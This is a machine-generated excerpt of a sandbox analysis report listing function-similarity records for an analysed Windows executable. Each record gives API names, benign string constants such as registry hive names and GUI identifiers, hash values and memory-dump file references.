                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: tooltips_class32
                                                            • API String ID: 698492251-1918224756
                                                            • Opcode ID: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction ID: 6daea82095195a2c6c3f1ecddaf9c5a9e2db93f346e281c2526946e3dec02532
                                                            • Opcode Fuzzy Hash: 134fb4e1424d2fb4e321c1dd5c8cc0f154a29b10d7bebbc83ea585521f9a7016
                                                            • Instruction Fuzzy Hash: 1AC13E32A087868BEB18DF65E4942EDB7A0FB89B94F940439DB6E47754DF38E841C710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID: @
                                                            • API String ID: 3869813825-2766056989
                                                            • Opcode ID: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction ID: 8aca6d88c2ae24ca24a5ab48e0166528a54e02c4261cb6f0b85e0742693795d8
                                                            • Opcode Fuzzy Hash: b82c187733dd5023c28d903207b62df0d5996a373ba8083c7f15af3311f57f4a
                                                            • Instruction Fuzzy Hash: 52819272A04A82C6EB41EF75E9546AD77B0FB44B88F884531CE0E97758DF38D846C720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Color$LongWindow$ModeObjectStockText
                                                            • String ID:
                                                            • API String ID: 554392163-0
                                                            • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                            • Instruction ID: e376f0f5198a89a1d57f4d8bed57345983ecf521eec73a0f3a0fd0f1b5f26262
                                                            • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                            • Instruction Fuzzy Hash: 2A819721D085D682FF60BB25B4882F9A391AF85755FDD0235CE5D476E4EF2CA8838721
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                            • API String ID: 222038402-1459072770
                                                            • Opcode ID: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                            • Instruction ID: ed0a552b0ba4ed530e5757f6baf85bdf729383ef92e68360660d5c5626afcc38
                                                            • Opcode Fuzzy Hash: cd0cb460e9213e7bbd7e72b67b5e96f7d513e8dcebbe310305f3515603c5f5bf
                                                            • Instruction Fuzzy Hash: 7E515E617086D286EE14FB22B5511F9A391AF85FD0FC88431ED1E4BB95DF3CE5068724
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 2091158083-3440237614
                                                            • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                            • Instruction ID: 50a8a6a5123e82f58a0fd01d4e933b78886bf66c00ee2e482fde68cc463eab32
                                                            • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                            • Instruction Fuzzy Hash: 39716172618AC296EB10EB55F8547EDA720FB84798FC40032DE4E17A99DF7CD146C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: SendString$BuffCharDriveLowerType
                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                            • API String ID: 1600147383-4113822522
                                                            • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                            • Instruction ID: 9494a028f6bdee519ba737d2279f437597658fb8e4d977a8e2c354c32d0939a8
                                                            • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                            • Instruction Fuzzy Hash: DF81AD32B18A9285EF00EF65E8512FCA3A1FB54B98BD80431CA4D47794EF3DE446C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit
                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                            • API String ID: 2610073882-3931177956
                                                            • Opcode ID: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                            • Instruction ID: 7f1b26398f57636eb506c51e5a8991a688ded8ab85ac5df9cd99e47a25f89af7
                                                            • Opcode Fuzzy Hash: 71cb67d8980752d71d61beca9315e30f05edd3d223294706e17d030598d61897
                                                            • Instruction Fuzzy Hash: A6026B32A486C286EF58BF65E0941FDA3A1EB05B84F8D5535CA0E27B94DF2DE851C320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                            • String ID: *.*
                                                            • API String ID: 1111067124-438819550
                                                            • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                            • Instruction ID: f125c80972f3431202f9c5e53cafe63690aa8a76daf9976cfe0980e2dd17e841
                                                            • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                            • Instruction Fuzzy Hash: 30716E32618BC691DF10FF12E8801EAB761FB84B98F885031DA4D47BA6DF79E54AC750
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID:
                                                            • API String ID: 2598888154-3916222277
                                                            • Opcode ID: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                            • Instruction ID: a678ec49473401ece1b0acc48fa47c0f10a439d261d5acf41f3914bfec6edb5a
                                                            • Opcode Fuzzy Hash: dea97f0d0ad0f9214e770fe855ba7d83dc888621a1f275c7b89ba2b07fbcc766
                                                            • Instruction Fuzzy Hash: C1515A76B15681CBEB50DF65F44069DBBB5F748B88F44812AEE4A93B18CF38D4168B10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 2706829360-2785691316
                                                            • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                            • Instruction ID: 09512010297499169d881628e396a80d3dfeb5c1f05ed5e72894077bc0268f5e
                                                            • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                            • Instruction Fuzzy Hash: 82515332A15A928AEF40EF66E9946FC7770FB84B88F894036DA0E47659DF38D445C360
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF75F1DFD7B), ref: 00007FF75F1E1143
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                            • Instruction ID: 1f74fa3a4703bd2a203e0fc7112970d8280136e69fabe4c992ca9baecffd0775
                                                            • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                            • Instruction Fuzzy Hash: F0E18752F089D782EE606B65A8403F9A691BF20B94BCC4539DB1D6B7D4EF3CE945C320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 4125642244-438819550
                                                            • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                            • Instruction ID: 70f4d1b6b140421669f4982fd0b61faf6aa57c93b2de1185f89122070135bfbf
                                                            • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                            • Instruction Fuzzy Hash: B0816222618AC286EF54EF15E4906FEB3A0FB84B94FC84036DA4E47B95DF78D545C720
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: LoadStringwprintf
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                            • API String ID: 3297454147-3080491070
                                                            • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                            • Instruction ID: 6e8420c3f6ab8f4c0b8fd866e942fa44b9507f92fa66524ccde27e50d3faec43
                                                            • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                            • Instruction Fuzzy Hash: BD614A62F18AC296EF00FB61E8445EDA361FB94784FC81432EA4D5369ADF7CE506C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Messagewprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 4051287042-2268648507
                                                            • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                            • Instruction ID: a04c289c93f8b7b828ec24d03a8fa22b38661b8d7e8e566634c464b7edf1f154
                                                            • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                            • Instruction Fuzzy Hash: 8B515D61F18AD692EF00FB64F8454EDA321FB94784BC81432EA0E5369AEF7CD506C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                            • String ID: BUTTON
                                                            • API String ID: 3935177441-3405671355
                                                            • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                            • Instruction ID: cbc5bf7d930c30470fbeab0b581a64f01d3e01cbed3a6bedaf81728c044e7d7e
                                                            • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                            • Instruction Fuzzy Hash: 8A312C65A0D6C7C2FF14BB20F8947F9A261AF85784FCD5031DA0E46695CF2CA8468F31
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1974058525-0
                                                            • Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                            • Instruction ID: 50b90e7442a9cc9505c6b402a428660fe5f63741027287caf64bd8db9412fff1
                                                            • Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                            • Instruction Fuzzy Hash: 55914561E09A8A86FF55FF61B4946B8A3A4EF84B88FDC4031CA4E57695DF3CE4418331
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                            • Instruction ID: 40ed83946c7ba829c9eda105e2bbc8cb0395143ed2e618aab57dc2b68d1ca165
                                                            • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                            • Instruction Fuzzy Hash: ED619372B046818BEB18DF69E4446ACB7E6FB88B84F548139DE0993F58DF3CD9058B10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerTypewcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 1561581874-1000479233
                                                            • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                            • Instruction ID: 81106bd3a1f2827d023a00f7ceda7cd3f6e166648e41dd46fe5acbc0e47c8497
                                                            • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                            • Instruction Fuzzy Hash: 6CD1A322E1CAD681EE20BF15A5501F9E3A1FB58BA4FD84231DA5D53798EF2CE9458320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                            • String ID: %s%u
                                                            • API String ID: 1412819556-679674701
                                                            • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                            • Instruction ID: 0774e4241f655099545340be20f37e43d9e47bf3d0a8fbf73b3d28714158e666
                                                            • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                            • Instruction Fuzzy Hash: 7EB1EF72B096C2D6EF18EF21E8446E8A760FB44B84FC80035CA1E47795DF39E955CB20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
